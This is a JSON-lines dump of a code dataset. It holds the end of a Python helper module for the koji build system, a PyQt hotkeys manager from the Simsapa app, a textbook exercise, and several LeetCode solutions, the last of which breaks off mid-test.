but can also be used to track\n more detailed situations where a requested data type wasn't\n present on the koji hub, rather than just working with\n `koji.GenericError`\n\n :since: 1.0\n \"\"\"\n\n complaint: str = \"Something bad happened\"\n\n\n def __str__(self):\n orig = super().__str__()\n return f\"{self.complaint}: {orig}\"\n\n\nclass NoSuchBuild(BadDingo):\n \"\"\"\n A build was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such build\"\n\n\nclass NoSuchHost(BadDingo):\n \"\"\"\n A host was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such host\"\n\n\nclass NoSuchChannel(BadDingo):\n \"\"\"\n A channel was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such builder channel\"\n\n\nclass NoSuchContentGenerator(BadDingo):\n \"\"\"\n A content generator was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such content generator\"\n\n\nclass NoSuchPackage(BadDingo):\n \"\"\"\n A package was not found\n\n :since: 1.1\n \"\"\"\n\n complaint = \"No such package\"\n\n\nclass NoSuchTag(BadDingo):\n \"\"\"\n A tag was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such tag\"\n\n\nclass NoSuchTarget(BadDingo):\n \"\"\"\n A target was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such target\"\n\n\nclass NoSuchTask(BadDingo):\n \"\"\"\n A task was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such task\"\n\n\nclass NoSuchUser(BadDingo):\n \"\"\"\n A user was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such user\"\n\n\nclass NoSuchPermission(BadDingo):\n \"\"\"\n A permission was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such permission\"\n\n\nclass NoSuchArchive(BadDingo):\n \"\"\"\n An archive was not found\n\n :since: 1.0\n \"\"\"\n\n complaint = \"No such archive\"\n\n\nclass NoSuchRepo(BadDingo):\n \"\"\"\n A repository was not found\n\n :since: 1.1\n \"\"\"\n\n complaint = \"No such repo\"\n\n\nclass NoSuchRPM(BadDingo):\n \"\"\"\n An RPM was not found\n \"\"\"\n\n complaint = \"No such RPM\"\n\n\nclass NotPermitted(BadDingo):\n \"\"\"\n A required permission was not associated with the currently logged\n in user account.\n \"\"\"\n\n complaint = \"Insufficient permissions\"\n\n\nclass FeatureUnavailable(BadDingo):\n \"\"\"\n A given feature isn't available due to the version on the koji hub\n \"\"\"\n\n complaint = \"The koji hub version doesn't support this feature\"\n\n\nKT = TypeVar('KT')\n\n\ndef iter_bulk_load(\n session: ClientSession,\n loadfn: Callable[[Any], Any],\n keys: Iterable[KT],\n err: bool = True,\n size: int = 100) -> Iterator[Tuple[KT, Any]]:\n \"\"\"\n Generic bulk loading generator. Invokes the given loadfn on each\n key in keys using chunking multicalls limited to the specified\n size.\n\n Yields (key, result) pairs in order.\n\n If err is True (default) then any faults will raise an exception.\n If err is False, then a None will be substituted as the result for\n the failing key.\n\n :param session: The koji session\n\n :param loadfn: The loading function, to be invoked in a multicall\n arrangement. Will be called once with each given key from keys\n\n :param keys: The sequence of keys to be used to invoke loadfn.\n\n :param err: Whether to raise any underlying fault returns as\n exceptions. Default, True\n\n :param size: How many calls to loadfn to chunk up for each\n multicall. Default, 100\n\n :raises koji.GenericError: if err is True and an issue\n occurrs while invoking the loadfn\n\n :since: 1.0\n \"\"\"\n\n for key_chunk in chunkseq(keys, size):\n session.multicall = True\n\n for key in key_chunk:\n loadfn(key)\n\n for key, info in zip(key_chunk, session.multiCall(strict=err)):\n if info:\n if \"faultCode\" in info:\n if err:\n raise convertFault(Fault(**info)) # type: ignore\n else:\n yield key, None\n else:\n yield key, info[0] # type: ignore\n else:\n yield key, None\n\n\ndef bulk_load(\n session: ClientSession,\n loadfn: Callable[[Any], Any],\n keys: Iterable[Any],\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[Any, Any]:\n \"\"\"\n Generic bulk loading function. Invokes the given `loadfn` on each\n key in `keys` using chunking multicalls limited to the specified\n size.\n\n Returns a dict associating the individual keys with the returned\n value of loadfn. If `results` is specified, it must support\n dict-like assignment via an update method, and will be used in\n place of a newly allocated dict to store and return the results.\n\n :param session: an active koji client session\n\n :param loadfn: The loading function, to be invoked in a multicall\n arrangement. Will be called once with each given key from `keys`\n\n :param keys: The sequence of keys to be used to invoke `loadfn`.\n These keys need to be individually hashable, or the `results`\n value needs to be specified with an instance that accepts\n assignmnet using these values as the key.\n\n :param err: Whether to raise any underlying fault returns as\n exceptions. Default, `True`\n\n :param size: How many calls to `loadfn` to chunk up for each\n multicall. Default, `100`\n\n :param results: storage for `loadfn` results. If specified, must\n support item assignment (like a dict) via an update method, and\n it will be populated and then used as the return value for this\n function. Default, a new dict will be allocated.\n\n :raises koji.GenericError: if `err` is `True` and an issue\n occurrs while invoking the `loadfn`\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n results.update(iter_bulk_load(session, loadfn, keys, err, size))\n return results\n\n\ndef bulk_load_builds(\n session: ClientSession,\n nvrs: Iterable[Union[str, int]],\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[Union[int, str],\n BuildInfo]:\n \"\"\"\n Load many buildinfo dicts from a koji client session and a\n sequence of NVRs.\n\n Returns a dict associating the individual NVRs with their\n resulting buildinfo.\n\n If err is True (default) then any missing build info will raise a\n `NoSuchBuild` exception. If err is False, then a None will be\n substituted into the ordered dict for the result.\n\n If results is non-None, it must support dict assignment, and will\n be used in place of a newly allocated dict to store and return the\n results.\n\n :param nvrs: Sequence of build NVRs or build IDs to load\n\n :param err: Raise an exception if an NVR fails to load. Default,\n True.\n\n :param size: Count of NVRs to load in a single multicall. Default,\n 100\n\n :param results: mapping to store the results in. Default, produce\n a new dict\n\n :raises NoSuchBuild: if err is True and any of the given builds\n could not be loaded\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n\n for key, info in iter_bulk_load(session, session.getBuild, nvrs,\n False, size):\n if err and not info:\n raise NoSuchBuild(key)\n else:\n results[key] = info\n\n return results\n\n\ndef bulk_load_tasks(\n session: ClientSession,\n task_ids: Iterable[int],\n request: bool = False,\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, TaskInfo]:\n \"\"\"\n Load many taskinfo dicts from a koji client session and a sequence\n of task IDs.\n\n Returns a dict associating the individual IDs with their resulting\n taskinfo.\n\n :param session: an active koji client session\n\n :param task_ids: IDs of tasks to be loaded\n\n :param request: if True then load the task's request data as\n well. Default, False\n\n :param err: raise an exception if a task fails to load. Default,\n True\n\n :param size: count of tasks to load in a single\n multicall. Default, 100\n\n :param results: mapping to store the results in. Default, produce\n a new dict\n\n :raises NoSuchTask: if err is True and a task couldn't be loaded\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n fn = partial(session.getTaskInfo, request=request, strict=False)\n\n for key_chunk in chunkseq(task_ids, size):\n for key, info in zip(key_chunk, fn(key_chunk)):\n if err and not info:\n raise NoSuchTask(key)\n else:\n results[key] = info\n\n return results\n\n\ndef bulk_load_tags(\n session: ClientSession,\n tags: Iterable[Union[str, int]],\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[Union[int, str],\n TagInfo]:\n \"\"\"\n Load many taginfo dicts from tag names or IDs.\n\n :param session: an active koji client session\n\n :param tags: tag IDs or names to load\n\n :param err: Raise an exception if a tag fails to load. Default,\n True.\n\n :param size: Count of tags to load in a single multicall. Default,\n 100\n\n :param results: mapping to store the results in. Default, produce\n a new dict\n\n :raises NoSuchTag: if err is True and a tag couldn't be loaded\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n\n if version_check(session, (1, 23)):\n fn = partial(session.getTag, blocked=True)\n else:\n fn = session.getTag # type: ignore\n\n for key, info in iter_bulk_load(session, fn, tags, False, size):\n if err and not info:\n raise NoSuchTag(key)\n else:\n results[key] = info\n\n return results\n\n\ndef bulk_load_rpm_sigs(\n session: ClientSession,\n rpm_ids: Iterable[int],\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[RPMSignature]]:\n \"\"\"\n Set up a chunking multicall to fetch the signatures for a list of\n RPM via `session.queryRPMSigs` for each ID in rpm_ids.\n\n Returns a dict associating the individual RPM IDs with their\n resulting RPM signature lists.\n\n If results is non-None, it must support a dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n results.update(iter_bulk_load(session, session.queryRPMSigs,\n rpm_ids, True, size))\n return results\n\n\ndef bulk_load_buildroot_archives(\n session: ClientSession,\n buildroot_ids: Iterable[int],\n btype: Optional[str] = None,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[ArchiveInfo]]:\n \"\"\"\n Set up a chunking multicall to fetch the archives of buildroots\n via `session.listArchives` for each buildroot ID in buildrood_ids.\n\n Returns a dict associating the individual buildroot IDs with their\n resulting archive lists.\n\n If results is non-None, it must support dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n fn = lambda i: session.listArchives(componentBuildrootID=i, type=btype)\n results.update(iter_bulk_load(session, fn, buildroot_ids, True, size))\n return results\n\n\ndef bulk_load_buildroot_rpms(\n session: ClientSession,\n buildroot_ids: Iterable[int],\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[RPMInfo]]:\n \"\"\"\n Set up a chunking multicall to fetch the RPMs of buildroots via\n `session.listRPMs` for each buildroot ID in buildrood_ids.\n\n Returns a dict associating the individual buildroot IDs with their\n resulting RPM lists.\n\n If results is non-None, it must support dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n fn = lambda i: session.listRPMs(componentBuildrootID=i)\n results.update(iter_bulk_load(session, fn, buildroot_ids, True, size))\n return results\n\n\ndef bulk_load_build_archives(\n session: ClientSession,\n build_ids: Iterable[int],\n btype: Optional[str] = None,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[ArchiveInfo]]:\n \"\"\"\n Set up a chunking multicall to fetch the archives of builds\n via `session.listArchives` for each build ID in build_ids.\n\n Returns a dict associating the individual build IDs with their\n resulting archive lists.\n\n If results is non-None, it must support dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n fn = lambda i: session.listArchives(buildID=i, type=btype)\n results.update(iter_bulk_load(session, fn, build_ids, True, size))\n return results\n\n\ndef bulk_load_build_rpms(\n session: ClientSession,\n build_ids: Iterable[int],\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, List[RPMInfo]]:\n \"\"\"\n Set up a chunking multicall to fetch the RPMs of builds via\n `session.listRPMS` for each build ID in build_ids.\n\n Returns a dict associating the individual build IDs with their\n resulting RPM lists.\n\n If results is non-None, it must support a dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n results.update(iter_bulk_load(session, session.listRPMs,\n build_ids, True, size))\n return results\n\n\ndef bulk_load_buildroots(\n session: ClientSession,\n broot_ids: Iterable[int],\n size: int = 100,\n results: Optional[dict] = None) -> Dict[int, dict]:\n \"\"\"\n Set up a chunking multicall to fetch the buildroot data via\n `session.getBuildroot` for each ID in broot_ids.\n\n Returns a dict associating the individual buildroot IDs with their\n resulting buildroot info dicts.\n\n If results is non-None, it must support a dict-like update method,\n and will be used in place of a newly allocated dict to store and\n return the results.\n\n :since: 1.0\n \"\"\"\n\n results = {} if results is None else results\n results.update(iter_bulk_load(session, session.getBuildroot,\n broot_ids, True, size))\n return results\n\n\ndef bulk_load_users(\n session: ClientSession,\n users: Iterable[Union[int, str]],\n err: bool = True,\n size: int = 100,\n results: Optional[dict] = None) -> Dict[Union[int, str],\n UserInfo]:\n \"\"\"\n Load many userinfo dicts from a koji client session and a sequence of\n user identifiers.\n\n Returns a dict associating the individual identifiers with their\n resulting userinfo.\n\n If err is True (default) then any missing user info will raise a\n NoSuchUser exception. If err is False, then a None will be\n substituted into the ordered dict for the result.\n\n If results is non-None, it must support dict assignment, and will\n be used in place of a newly allocated dict to store and return the\n results.\n\n :param session: active koji session\n\n :param users: user names or IDs to load\n\n :param err: halt on problems and raise an exception. Default, True\n\n :param size: number of users to load in a single\n multicall. Default, 100\n\n :param results: dict to store results in. Default, allocate a new\n dict\n\n :raises NoSuchUser: if err is True and a user could not be loaded\n\n :since: 1.0\n \"\"\"\n\n users = tuple(users)\n results = {} if results is None else results\n\n if not users:\n return results\n\n # we need to identify which signature the getUser API will\n # support. Unfortunately the change in signatures happened before\n # there was a way to check the hub version. First we'll check\n # whether there's already a cached answer as to which API is\n # available\n session_vars = vars(session)\n new_get_user = session_vars.get(\"__new_get_user\")\n\n if new_get_user is None:\n # there wasn't already an answer, so we'll have to find out\n # ourselves. In this case we'll load the first user in the\n # list of users separately, outside of a multicall, and using\n # the as_userinfo function. This function will first try the\n # newer signature. If successful, it will record\n # __new_get_user as True, and we'll know to use the newer\n # signature. If not, the function will retry with the older\n # signature and set __new_get_user to False.\n\n key = users[0]\n users = users[1:]\n\n try:\n results[key] = as_userinfo(session, key)\n except NoSuchUser:\n if err:\n raise\n else:\n results[key] = None\n\n # the use of as_userinfo will have updated the __new_get_user\n # sentinel attribute to either True or False\n new_get_user = session_vars.get(\"__new_get_user\")\n\n if new_get_user:\n fn = lambda u: session.getUser(u, False, True)\n else:\n fn = session.getUser\n\n for key, info in iter_bulk_load(session, fn, users, False, size):\n if err and not info:\n raise NoSuchUser(key)\n else:\n results[key] = info\n\n return results\n\n\ndef as_buildinfo(\n session: ClientSession,\n build: BuildSpec) -> BuildInfo:\n \"\"\"\n Coerces a build value into a koji build info dict.\n\n If build is an\n * int, will attempt to load as a build ID\n * str, will attempt to load as an NVR\n * dict, will presume already a build info\n\n :param session: active koji session\n\n :param build: value to lookup\n\n :raises NoSuchBuild: if the build value could not be resolved\n into a build info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(build, (str, int)):\n info = session.getBuild(build)\n elif isinstance(build, dict):\n info = build\n else:\n info = None\n\n if not info:\n raise NoSuchBuild(build)\n\n return info\n\n\ndef as_channelinfo(\n session: ClientSession,\n channel: ChannelSpec) -> ChannelInfo:\n \"\"\"\n Coerces a channel value into a koji channel info dict.\n\n If channel is an\n * int, will attempt to load as a channel ID\n * str, will attempt to load as a channel name\n * dict, will presume already a channel info\n\n :param session: an active koji client session\n\n :param channel: value to lookup\n\n :raises NoSuchChannel: if the channel value could not be resolved\n into a channel info dict\n\n :since: 1.1\n \"\"\"\n\n if isinstance(channel, (str, int)):\n info = session.getChannel(channel)\n elif isinstance(channel, dict):\n info = channel\n else:\n info = None\n\n if not info:\n raise NoSuchChannel(channel)\n\n return info\n\n\ndef as_taginfo(\n session: ClientSession,\n tag: TagSpec) -> TagInfo:\n \"\"\"\n Coerces a tag value into a koji tag info dict.\n\n If tag is an\n * int, will attempt to load as a tag ID\n * str, will attempt to load as a tag name\n * dict, will presume already a tag info\n\n :param session: active koji session\n\n :param tag: value to lookup\n\n :raises NoSuchTag: if the tag value could not be resolved into a\n tag info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(tag, (str, int)):\n if version_check(session, (1, 23)):\n info = session.getTag(tag, blocked=True)\n else:\n info = session.getTag(tag)\n\n elif isinstance(tag, dict):\n info = tag\n\n else:\n info = None\n\n if not info:\n raise NoSuchTag(tag)\n\n return info\n\n\ndef as_taskinfo(\n session: ClientSession,\n task: TaskSpec) -> TaskInfo:\n \"\"\"\n Coerces a task value into a koji task info dict.\n\n If task is an\n * int, will attempt to load as a task ID\n * dict, will presume already a task info\n\n Note that if this function does attempt to load a task, it will\n request it with the task's request data as well.\n\n :param session: active koji session\n\n :param task: value to lookup\n\n :raises NoSuchTask: if the task value could not be resolved\n into a task info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(task, int):\n info = session.getTaskInfo(task, True)\n elif isinstance(task, dict):\n info = task\n else:\n info = None\n\n if not info:\n raise NoSuchTask(task)\n\n return info\n\n\ndef as_targetinfo(\n session: ClientSession,\n target: TargetSpec) -> TargetInfo:\n \"\"\"\n Coerces a target value into a koji target info dict.\n\n If target is an\n * int, will attempt to load as a target ID\n * str, will attempt to load as a target name\n * dict, will presume already a target info\n\n :param session: active koji session\n\n :param target: value to lookup\n\n :raises NoSuchTarget: if the target value could not be resolved\n into a target info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(target, (str, int)):\n info = session.getBuildTarget(target)\n elif isinstance(target, dict):\n info = target\n else:\n info = None\n\n if not info:\n raise NoSuchTarget(target)\n\n return info\n\n\ndef as_hostinfo(\n session: ClientSession,\n host: HostSpec) -> HostInfo:\n \"\"\"\n Coerces a host value into a host info dict.\n\n If host is an:\n * int, will attempt to load as a host ID\n * str, will attempt to load as a host name\n * dict, will presume already a host info\n\n :param session: active koji session\n\n :param host: value to lookup\n\n :raises NoSuchHost: if the host value could not be resolved\n into a host info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(host, (str, int)):\n info = session.getHost(host)\n elif isinstance(host, dict):\n info = host\n else:\n info = None\n\n if not info:\n raise NoSuchHost(host)\n\n return info\n\n\ndef as_packageinfo(\n session: ClientSession,\n pkg: PackageSpec) -> PackageInfo:\n \"\"\"\n Coerces a host value into a host info dict.\n\n If pkg is an:\n * int, will attempt to load as a package ID\n * str, will attempt to load as a package name\n * dict, will presume already a package info\n\n :param session: an active koji client session\n\n :param pkg: value to lookup\n\n :raises NoSuchPackage: if the pkg value could not be resolved into\n a package info dict\n\n :since: 1.1\n \"\"\"\n\n if isinstance(pkg, (str, int)):\n info = session.getPackage(pkg)\n elif isinstance(pkg, dict):\n info = pkg\n else:\n info = None\n\n if not info:\n raise NoSuchPackage(pkg)\n\n return info\n\n\ndef as_archiveinfo(\n session: ClientSession,\n archive: ArchiveSpec) -> ArchiveInfo:\n \"\"\"\n Coerces an archive value into an archive info dict.\n\n If archive is an:\n * int, will attempt to load as an archive ID\n * str, will attempt to load as the first-found archive matching\n the given filename\n * dict, will presume already an archive info\n\n :param session: active koji session\n\n :param archive: value to lookup\n\n :raises NoSuchArchive: if the archive value could not be resolved\n into an archive info dict\n\n :since: 1.0\n \"\"\"\n\n if isinstance(archive, int):\n info = session.getArchive(archive)\n\n elif isinstance(archive, str):\n found = session.listArchives(filename=archive)\n info = found[0] if found else None\n\n elif isinstance(archive, dict):\n info = archive\n\n else:\n info = None\n\n if not info:\n raise NoSuchArchive(archive)\n\n return info\n\n\ndef as_repoinfo(\n session: ClientSession,\n repo: RepoSpec) -> RepoInfo:\n \"\"\"\n Coerces a repo value into a Repo info dict.\n\n If repo is an:\n * dict with name, will attempt to load the current repo from a\n tag by that name\n * str, will attempt to load the current repo from a tag by name\n * int, will attempt to load the repo by ID\n * dict, will presume already a repo info\n\n :param session: active koji session\n\n :param repo: value to lookup\n\n :raises NoSuchRepo: if the repo value could not be resolved\n into a repo info dict\n\n :since: 1.1\n \"\"\"\n\n info: RepoInfo = None\n\n if isinstance(repo, dict):\n if \"name\" in repo:\n tag = cast(TagInfo, repo)\n repo = tag[\"name\"]\n else:\n info = cast(RepoInfo, repo)\n\n if isinstance(repo, str):\n repotag = session.getRepo(repo)\n if repotag is None:\n raise NoSuchRepo(repo)\n repo = repotag[\"id\"]\n\n if isinstance(repo, int):\n info = session.repoInfo(repo)\n\n if not info:\n raise NoSuchRepo(repo)\n\n return info\n\n\ndef as_rpminfo(\n session: ClientSession,\n rpm: RPMSpec) -> RPMInfo:\n \"\"\"\n Coerces a host value into a RPM info dict.\n\n If rpm is specified as an:\n * int, will attempt to load as a RPM ID\n * str, will attempt to load as a RPM NVRA\n * dict, will presume already an RPM info\n\n :param session: active koji session\n\n :param rpm: value to lookup\n\n :raises NoSuchRPM: if the rpm value could not be resolved\n into a RPM info dict\n\n :since: 1.0\n \"\"\"\n\n info: RPMInfo\n\n if isinstance(rpm, (str, int)):\n info = session.getRPM(rpm) # type: ignore\n elif isinstance(rpm, dict):\n info = rpm\n else:\n info = None\n\n if not info:\n raise NoSuchRPM(rpm)\n\n return info\n\n\ndef as_userinfo(\n session: ClientSession,\n user: UserSpec) -> UserInfo:\n \"\"\"\n Resolves user to a userinfo dict.\n\n If user is a str or int, then getUser will be invoked. If user is\n already a dict, it's presumed to be a userinfo already and it's\n returned unaltered.\n\n :param session: active koji session\n\n :param user: Name, ID, or User Info describing a koji user\n\n :raises NoSuchUser: when user cannot be found\n\n :since: 1.0\n \"\"\"\n\n if isinstance(user, (str, int)):\n session_vars = vars(session)\n new_get_user = session_vars.get(\"__new_get_user\")\n\n if new_get_user:\n # we've tried the new way and it worked, so keep doing it.\n info = session.getUser(user, False, True)\n\n elif new_get_user is None:\n # an API incompatibility emerged at some point in Koji's\n # past, so we need to try the new way first and fall back\n # to the older signature if that fails. This happened\n # before Koji hub started reporting its version, so we\n # cannot use the version_check function to gate this.\n try:\n info = session.getUser(user, False, True)\n session_vars[\"__new_get_user\"] = True\n\n except ParameterError:\n info = session.getUser(user)\n session_vars[\"__new_get_user\"] = False\n\n else:\n # we've already tried the new way once and it didn't work.\n info = session.getUser(user)\n\n elif isinstance(user, dict):\n info = user\n\n else:\n info = None\n\n if not info:\n raise NoSuchUser(user)\n\n return info\n\n\ndef _int(val):\n if isinstance(val, str) and val.isdigit():\n val = int(val)\n return val\n\n\ndef hub_version(\n session: ClientSession) -> Tuple[int]:\n \"\"\"\n Wrapper for ``session.getKojiVersion`` which caches the results on\n the session and splits the value into a tuple of ints for easy\n comparison.\n\n If the getKojiVersion method isn't implemented on the hub, we\n presume that we're version 1.22 ``(1, 22)`` which is the last\n version before the getKojiVersion API was added.\n\n :param session: active koji session\n\n :since: 1.0\n \"\"\"\n\n # we need to use this instead of getattr as koji sessions will\n # automatically create all missing properties as proxies to a\n # remote hub method.\n session_vars = vars(session)\n\n hub_ver = session_vars.get(\"__hub_version\", None)\n if hub_ver is None:\n try:\n hub_ver = session.getKojiVersion()\n except GenericError:\n pass\n\n if hub_ver is None:\n hub_ver = (1, 22)\n\n elif isinstance(hub_ver, str):\n hub_ver = tuple(map(_int, hub_ver.split(\".\")))\n\n session_vars[\"__hub_version\"] = hub_ver\n\n return hub_ver\n\n\ndef version_check(\n session: ClientSession,\n minimum: HubVersionSpec = (1, 23)) -> bool:\n \"\"\"\n Verifies that the requested minimum version is met compared\n against session.getKojiVersion.\n\n If the getKojiVersion method isn't implemented on the hub, we\n presume that we're version 1.22 (the last version before\n getKojiVersion was added). Because of this, checking for minimum\n versions lower than 1.23 will always return True.\n\n Version is specified as a tuple of integers, eg. 1.23 is ``(1,\n 23)``\n\n :param session: active koji session\n\n :param minimum: Minimum version required. Default, ``(1, 23)``\n\n :since: 1.0\n \"\"\"\n\n if isinstance(minimum, str):\n minimum = tuple(map(_int, minimum.split(\".\")))\n\n hub_ver = hub_version(session)\n\n return bool(hub_ver and hub_ver >= minimum)\n\n\ndef version_require(\n session: ClientSession,\n minimum: HubVersionSpec = (1, 23),\n message: Optional[str] = None) -> bool:\n \"\"\"\n Verifies that the requested minimum version is met compared\n against ``session.getKojiVersion()``\n\n If the getKojiVersion method isn't implemented on the hub, we\n presume that we're version 1.22 (the last version before\n getKojiVersion was added). Because of this, checking for minimum\n versions lower than 1.23 will always return True.\n\n Version is specified as a tuple of integers, eg. 1.23 is ``(1,\n 23)``\n\n If the version requirement is not met, a `FeatureUnavailable`\n exception is raised, with the given message. If message is not\n provided, a simple one is constructed based on the minimum value.\n\n :param session: active koji session\n\n :param minimum: Minimum version required. Default, ``(1, 23)``\n\n :param message: Message to use in exception if version check\n fails. Default, with a minimum of ``(1, 23)``, ``\"requires >=\n 1.23\"``\n\n :raises FeatureUnavailable: If the minimum version is not met\n\n :since: 1.0\n \"\"\"\n\n if version_check(session, minimum=minimum):\n return True\n\n if message is None:\n if isinstance(minimum, (list, tuple)):\n minimum = \".\".join(str(m) for m in minimum)\n message = f\"requires >= {minimum}\"\n\n raise FeatureUnavailable(message)\n\n\n#\n# The end.\n","repo_name":"obriencj/koji-smoky-dingo","sub_path":"kojismokydingo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":37722,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"32671005507","text":"from PyQt6.QtWidgets import QMainWindow\n\nfrom simsapa.keyboard import keyboard\n\nfrom simsapa import logger\nfrom simsapa.app.actions_manager import ActionsManager\nfrom simsapa.app.hotkeys_manager_interface import HotkeysManagerInterface\n\nclass HotkeysManagerWindowsMac(HotkeysManagerInterface):\n def __init__(self, actions_manager: ActionsManager):\n super().__init__(actions_manager)\n\n try:\n keyboard.add_hotkey(\"ctrl+shift+f6\", self.show_word_lookup, suppress=True)\n keyboard.add_hotkey(\"ctrl+shift+s\", self.lookup_clipboard_in_suttas, suppress=True)\n keyboard.add_hotkey(\"ctrl+shift+g\", self.lookup_clipboard_in_dictionary, suppress=True)\n except Exception as e:\n logger.error(f\"Can't init hotkeys: {e}\")\n\n def setup_window(self, window: QMainWindow):\n print(\"NotImplementedError %s\" % str(window))\n pass\n\n def unregister_all_hotkeys(self):\n logger.info(\"unregister_all_hotkeys()\")\n try:\n keyboard.unhook_all_hotkeys()\n except Exception as e:\n logger.error(e)\n","repo_name":"simsapa/simsapa","sub_path":"simsapa/app/hotkeys_manager_windows_mac.py","file_name":"hotkeys_manager_windows_mac.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"} +{"seq_id":"28991015738","text":"# Python Crash Course: A Hands-On, Project-Based Introduction To Programming\n#\n# Name: Mark Lester Apuya\n# Date: 05/29/2021\n#\n# Chapter 8: Functions\n#\n# Exercise 8.5 Cities:\n# Write a function called describe_city() that accepts the name of a city and \n# its country. The function should print a simple sentence, such as Reykjavik \n# is in Iceland. Give the parameter for the country a default value. Call your \n# function for three different cities, at least one of which is not in the \n# default country.\n\ndef describe_city(city, country='unied states'):\n \"\"\"\n Describes a city.\n \"\"\"\n print(f\"{city.title()} is in {country.title()}.\")\n\ndescribe_city('honolulu')\ndescribe_city('los angeles')\ndescribe_city('tokyo', 'japan')","repo_name":"apuya/python_crash_course","sub_path":"Part_1_Basics/Chapter_8_Functions/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72131058638","text":"class Solution:\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n maxProfit,minPrice = 0,float('inf')\n for price in prices:\n minPrice = min(minPrice,price)\n profit = price - minPrice\n maxProfit = max(maxProfit, profit)\n return maxProfit\n\nif __name__=='__main__':\n prices = [7,6,4,3,1] #[7,1,5,3,6,4]\n s = Solution\n res = s.maxProfit(s,prices)\n print(res)","repo_name":"JohnnySu-SJTUer/LeetCodeLearning","sub_path":"121_easy_maxProfit1.py","file_name":"121_easy_maxProfit1.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"23745451082","text":"# https://leetcode.com/problems/jewels-and-stones/\r\n\r\nclass Solution:\r\n def numJewelsInStones(self, jewels: str, stones: str) -> int:\r\n \r\n d = dict()\r\n\r\n c=0\r\n\r\n for i in range(0,len(stones)):\r\n d[stones[i]]=0\r\n\r\n for i in range(0,len(jewels)):\r\n d[jewels[i]]=1\r\n\r\n for i in range(0,len(stones)):\r\n if d[stones[i]]==1:\r\n c+=1\r\n\r\n return c\r\n\r\nif __name__ == \"__main__\":\r\n sol = Solution()\r\n print(sol.numJewelsInStones(\"aA\",\"aAAbbbb\"))\r\n\r\n ","repo_name":"chamox/tech-mentorship","sub_path":"module_1/jewels_and_stones.py","file_name":"jewels_and_stones.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"3999651434","text":"# Definition for a binary tree node.\nimport unittest\n\n\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n # Beats 78%.\n def preorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n result = []\n\n stack = []\n if root is not None:\n stack.append(root)\n while len(stack) != 0:\n top_element = stack.pop()\n result.append(top_element.val)\n if top_element.right is not None:\n stack.append(top_element.right)\n if top_element.left is not None:\n stack.append(top_element.left)\n return result\n\n\nclass SolutionTest(unittest.TestCase):\n def test_solution(self):\n s = Solution()\n\n # Case 1: simple tree\n root = TreeNode(1)\n left = TreeNode(2)\n right = TreeNode(3)\n root.left = left\n root.right = right\n\n self.assertEqual([1,2,3], s.preorderTraversal(root))\n\n # Case 2: root -> left -> left -> left\n root = TreeNode(-1)\n temp_root = root\n for i in range(5):\n node = TreeNode(i)\n temp_root.left = node\n temp_root = node\n\n self.assertEqual([-1, 0, 1, 2, 3, 4], s.preorderTraversal(root))\n\n # Case 3: root - right -> right -> right\n root = TreeNode(-1)\n temp_root = root\n for i in range(5):\n node = TreeNode(i)\n temp_root.right = node\n temp_root = node\n\n self.assertEqual([-1, 0, 1, 2, 3, 4], s.preorderTraversal(root))\n\n # Case 4: a normal tree\n '''\n 0\n / \\\n 1 2\n / \\ \\\n 3 4 5\n / \\ / /\n 6 7 8 9\n\n '''\n root = TreeNode(0)\n root.left = TreeNode(1)\n root.right = TreeNode(2)\n root.left.left = 